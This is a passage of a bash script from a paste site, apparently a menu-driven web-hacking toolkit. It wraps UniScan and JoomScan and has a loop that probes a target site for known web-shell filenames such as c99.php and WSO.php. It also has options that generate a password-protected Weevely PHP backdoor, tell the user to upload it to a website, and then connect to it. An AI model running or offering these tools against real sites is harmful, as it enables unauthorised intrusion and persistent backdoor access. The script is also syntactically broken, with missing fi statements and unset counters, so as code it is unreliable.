  2323. tput sgr0
  2324. echo -e " "
  2325. echo -e " "
  2326. echo -e "$var admin pages."
  2327. echo -e "$var2 302 pages."
  2328. echo -e "$var3 total pages tested."
  2329. echo
  2330. read -p "Press Enter : "
  2331. echo
  2332. exit
  2333. #================================== Admin panel finder ends ======================================
  2334. #Uni-Scan Scanning Script
  2335. if [ "$mychoice" = "21" ]; then
  2336. echo -e "\e[1;31m <^> UniScan v5.3 Web Vulnerability Scanner <^> \e[0m"
  2337. echo
  2338. echo -e "\e[1;31m [+] This tool is not coded by Freak Coderz [+] \e[0m"
  2339. echo
  2340. read -p "[+] Enter Website URL ( For example :- http://www.target.com/ ) :- " web
  2341. #Blank input
  2342. if [ -z $web ]; then
  2343. echo "-_- ----------------------------- -_- "
  2344. echo -e "\e[1;31m Blank Input \e[0m"
  2345. echo "-_- ----------------------------- -_- "
  2346. exit
  2347. echo
  2348. echo -e "\e[1;32mScanning $web for the Vulnerabilities xD , This may take time so please be patience :) \e[0m"
  2349. res=`cd /pentest/web/uniscan; ./uniscan.pl -u $web -qweds | grep -v '*' | grep -v 'Searching' | grep '.'`
  2350. echo
  2351. echo "<----------------------------------------------------------------------------------->"
  2352. echo -e "<^> Result of $web :-"
  2353. echo
  2354. echo -e "\e[1;31m$res\e[0m"
  2355. echo "<----------------------------------------------------------------------------------->"
  2356. read " Press Enter to continue xD"
  2357. #Uploaded shell finder
  2358. if [ "$mychoice" = "22" ]; then
  2359. #All variables
  2360. TIME="0" # sleep time among each request
  2361. CURL="/usr/bin/curl"
  2362. GREP="/bin/grep"
  2363. CUT="/usr/bin/cut"
  2364. #Colors
  2365. red="\e[1;31m"
  2366. green="\e[1;32m"
  2367. yellow="\e[1;33m"
  2368. blue="\e[1;34m"
  2369. white="\e[1;30m"
  2370. no="\e[0m"
  2371. #Firefox BAnner
  2372. BANNER="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; FDM; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
  2373. #Error script
  2374. get_error() {
  2375. echo -e "\n\tError, incorrect parameters\n"
  2376. exit 1
  2377. echo
  2378. echo -e "$green <^>---------------> IP-DiggEr Uploaded Shell Finder -------------------><^>"
  2379. echo -e "$green - Coded by Silent_Hacker ( Manoj Nath )$no"
  2380. echo
  2381. echo -e
  2382. read -p " Enter the website ( For Example :- http://www.target.com/ ) :- " web
  2383. if [ -z "$web" ]; then
  2384. get_error
  2385. #Uploaded shells
  2386. shells[0]="c99.php"
  2387. shells[1]="templates/c99.php"
  2388. shells[2]="includes/c99.php"
  2389. shells[3]="uploads/c99.php"
  2390. shells[4]="media/c99.php"
  2391. shells[5]="C99.php"
  2392. shells[6]="sok.php"
  2393. shells[7]="king.php"
  2394. shells[8]="c100.php"
  2395. shells[9]="config.php"
  2396. shells[10]="templates/config.php"
  2397. shells[11]="images/config.php"
  2398. shells[12]="media/config.php"
  2399. shells[13]="sql.php"
  2400. shells[14]="templates/sql.php"
  2401. shells[15]="includes/sql.php"
  2402. shells[16]="tmp/sql.php"
  2403. shells[17]="files/sql.php"
  2404. shells[18]="uploads/sql.php"
  2405. shells[19]="images/sql.php"
  2406. shells[20]="media/sql.php"
  2407. shells[21]="changeall.php"
  2408. shells[22]="cpn.php"
  2409. shells[23]="templates/cpn.php"
  2410. shells[24]="Cpanel.php"
  2411. shells[25]="style.php"
  2412. shells[26]="pak.php"
  2413. shells[27]="WSO.php"
  2414. shells[29]="teamr00t.php"
  2415. shells[30]="sym.php"
  2416. shells[31]="media/sym.php"
  2417. shells[32]="uploads/sym.php"
  2418. shells[33]="zone-h.php"
  2419. shells[34]="templates/zone-h.php"
  2420. shells[35]="uploads/zone-h.php"
  2421. shells[36]="shell.php"
  2422. shells[37]="includes/shell.php"
  2423. shells[38]="tmp/shell.php"
  2424. shells[39]="files/shell.php"
  2425. shells[39]="uploads/shell.php"
  2426. shells[40]="madspot.php"
  2427. shells[41]="madspotshell.php"
  2428. shells[42]="mad.php"
  2429. shells[43]="files/madspot.php"
  2430. shells[44]="uploads/madspot.php"
  2431. shells[45]="images/madspot.php"
  2432. shells[46]="templates/madspotshell.php"
  2433. shells[47]="includes/madspotshell.php"
  2434. shells[48]="tmp/madspotshell.php"
  2435. shells[49]="files/madspotshell.php"
  2436. shells[50]="uploads/madspotshell.php"
  2437. shells[51]="images/madspotshell.php"
  2438. shells[52]="media/madspotshell.php"
  2439. shells[53]="itsecteam.php"
  2440. shells[54]="templates/itsecteam.php"
  2441. shells[55]="includes/itsecteam.php"
  2442. shells[56]="tmp/itsecteam.php"
  2443. shells[57]="files/itsecteam.php"
  2444. shells[58]="uploads/itsecteam.php"
  2445. shells[59]="anon.php"
  2446. shells[60]="files/anon.php"
  2447. shells[61]="uploads/anon.php"
  2448. shells[62]="images/anon.php"
  2449. shells[63]="media/anon.php"
  2450. shells[64]="x.php"
  2451. shells[65]="h4xor.php"
  2452. shells[66]="whmcs.php"
  2453. shells[67]="templates/whmcs.php"
  2454. shells[68]="includes/whmcs.php"
  2455. shells[69]="files/whmcs.php"
  2456. shells[70]="uploads/whmcs.php"
  2457. shells[71]="b347k.php"
  2458. shells[72]="templates/b347k.php"
  2459. shells[73]="includes/b347k.php"
  2460. shells[74]="files/b347k.php"
  2461. shells[75]="uploads/b347k.php"
  2462. shells[76]="images/b347k.php"
  2463. shells[77]="media/b347k.php"
  2464. OIFS=$IFS
  2465. IFS=""
  2466. XPLC="0" # Number of Shells found
  2467. XPL="" # SHells Found
  2468. TOTALTEST=${#shells[@]}
  2469. let "TOTALTEST -= 1" # Total Shells
  2470. echo
  2471. echo -e "$yellow Scanning $web for the Uploaded shell xD $no"
  2472. echo
  2473. echo -e "$yellow Total Shells in our databse :-$no $TOTALTEST"
  2474. echo
  2475. echo -e "$yellow Search started for Uploaded shell in $web"
  2476. for x in ${shells[*]}; do
  2477. code=`$CURL -A $BANNER -sL -w "%{http_code}\\n" $web${shells[$i]} -o "/dev/null"`
  2478. echo -en "$B [+] Total Shells in our database: $i / $TOTALTEST"
  2479. if [ $i -le 9 ]; then
  2480. echo -e -n "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"
  2481. echo -n " [$i] -> $web${shells[$i]}"
  2482. elif [ $i -le 99 ]; then
  2483. echo -e -n "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"
  2484. echo -n " [$i] -> $web${shells[$i]}"
  2485. else
  2486. echo -e -n "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"
  2487. echo -n " [$i] -> $web${shells[$i]}"
  2488. fi
  2489. if [ "$code" == "200" ]; then
  2490. echo -e " Shell found :- $web[XPL] $no"
  2491. XPL[$y]=${shells[$i]}
  2492. let XPLC=$XPLC+1
  2493. let y=$y+1
  2494. if [ "$code" == "404" ]; then
  2495. echo -e " Shell Not found "
  2496. let i=$i+1
  2497. sleep $TIME
  2498. done
  2499. echo
  2500. echo -e "-----------------------> $red Result of the Scanning <----------------------------------"
  2501. echo
  2502. echo -e "$yellow [+] Report Date :- [$red " `date` "$no ]"
  2503. echo
  2504. echo -e "$yellow [+] Website :- $red $web"
  2505. echo
  2506. echo -e "$yellow [+] Uploaded shells found :- $XPLC "
  2507. echo
  2508. for x in ${XPL[*]}; do
  2509. echo -e "$yellow [$z]$no ${XPL[$z]}"
  2510. echo
  2511. let z=$z+1
  2512. done
  2513. read -p " Thanx for using xD"
  2514. exit
  2515. #Websploit T0olKit
  2516. if [ "$mychoice" = "25" ];then
  2517. cd /pentest/exploits/websploit; python websploit
  2518. #Weevely Backd0or Generat0r
  2519. if [ "$mychoice" = "23" ]; then
  2520. echo -e "\e[1;33m <---------------------------------> Weevely BackD0or Generat0r <---------------------------------> "
  2521. echo
  2522. echo -e "\e[1;33m [+] Weevely is not coded by Us but simplified by Silent Hacker xD \e[0m "
  2523. echo
  2524. echo
  2525. read -p "[+] Enter the Password For your Backd0or :- " password
  2526. read -p "[+] Name of the Backdoor ( For Example Freak.php ):- " name
  2527. dir="/root/Desktop/$name"
  2528. #no input
  2529. if [ -z $password ]; then
  2530. echo "-_- ----------------------------- -_- "
  2531. echo -e "\e[1;31m Blank Input For Password \e[0m"
  2532. echo "-_- ----------------------------- -_- "
  2533. exit
  2534. if [ -z $name ]; then
  2535. echo "-_- ----------------------------- -_- "
  2536. echo -e "\e[1;31m Blank Input For Name \e[0m"
  2537. echo "-_- ----------------------------- -_- "
  2538. exit
  2539. res=`cd /pentest/web/backdoors/weevely; python weevely.py generate $password $dir`
  2540. echo
  2541. echo -e "\e[1;35m Successfully Generated Your Backd0or With Password :-\e[1;34m $password\e[0m \e[1;35mand Name :-\e[1;34m $name \e[0m\e[1;35min the Desktop "
  2542. echo -e "\e[1;35mNow Upload your backdoor in the website and change the permission of the Backd0or to 0755 \e[0m"
  2543. read -p " Press Enter to C0ntinue "
  2544. #Weevely Backdo0r Conn3ct0r :D
  2545. if [ "$mychoice" = "24" ]; then
  2546. echo -e "\e[1;33m <---------------------------------> Weevely BackD0or Server Connect0r <---------------------------------> "
  2547. echo
  2548. echo -e "\e[1;33m After creating backdoor and changing permission Now time to connect with the Backd0or \e[0m "
  2549. echo
  2550. echo
  2551. echo
  2552. read -p "[+] Enter the Link of the Uploaded Backd0or ( Example :- http://www.target.com/back.php ):- " link
  2553. read -p "[+] Enter the Password of the Backd0or :- " pass
  2554. #Blank inputs
  2555. if [ -z $link ]; then
  2556. echo "-_- ----------------------------- -_- "
  2557. echo -e "\e[1;31m Blank Input For Webdo0r link \e[0m"
  2558. echo "-_- ----------------------------- -_- "
  2559. exit
  2560. if [ -z $pass ]; then
  2561. echo "-_- ----------------------------- -_- "
  2562. echo -e "\e[1;31m Blank Input For Password \e[0m"
  2563. echo "-_- ----------------------------- -_- "
  2564. exit
  2565. cd /pentest/web/backdoors/weevely; python weevely.py $link $pass
  2566. # JOOM SCAN SCRIPT
  2567. if [ "$mychoice" = "19" ]; then
  2568. echo -e "\e[1;31m <^> Joomla Vulnerability Scanner v 1.0 <^> \e[0m"
  2569. echo
  2570. echo -e "\e[1;31m Sil3nt_H4x0r - This tools helps in searching the Vulnerability in the Joomla Websites xD \e[0m"
  2571. echo
  2572. read -p "[+] Enter the Website Url :- " url
  2573. #<!--- IF STATMENT STARTS TO CHECK BLANK INPUT---!>
  2574. if [ -z $url ]; then
  2575. echo "-_- ----------------------------- -_- "
  2576. echo -e "\e[1;31m Blank Input \e[0m"
  2577. echo "-_- ----------------------------- -_- "
  2578. exit
  2579. echo
  2580. read -p " Do You want to create a seperate .txt file for the result Yes/No " ans
  2581. if [ "$ans" = "Yes" ]; then
  2582. echo -e " \e[1;32m[*] Scanning $url for the Vulnerability This may take time so, Please be Patience \e[0m"
  2583. cd /pentest/web/joomscan; ./joomscan.pl -u $url | grep -v '*' | grep -v 'Searching' | grep '.' > joomla_results
  2584. mv joomla_results -t /root/Desktop
  2585. echo
  2586. echo -e "\e[1;35m [+] Results have been saved in the Desktop with file name joomla_results , Change the File name to prevent Over write xD "
  2587. echo
  2588. echo -e "\e[1;31m ---------------------------------------------------------<^>----------------------------------------------------------"
  2589. else
  2590. echo -e " \e[1;31m[*] Scanning $url for the Vulnerability This may take time so, Please be Patience \e[0m"
  2591. res=`cd /pentest/web/joomscan; ./joomscan.pl -u $url | grep -v '*' | grep -v 'Searching' | grep '.'`
  2592. echo
  2593. echo " Result of the Joom Scan :- "
  2594. echo "----------------------------<^>----------------------------"
  2595. echo -e "\e[1;31m$res\e[0m"
  2596. echo
  2597. echo "----------------------------<^>----------------------------"
  2598. echo
  2599. read -p "Press Enter to Cont"
  2600. done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement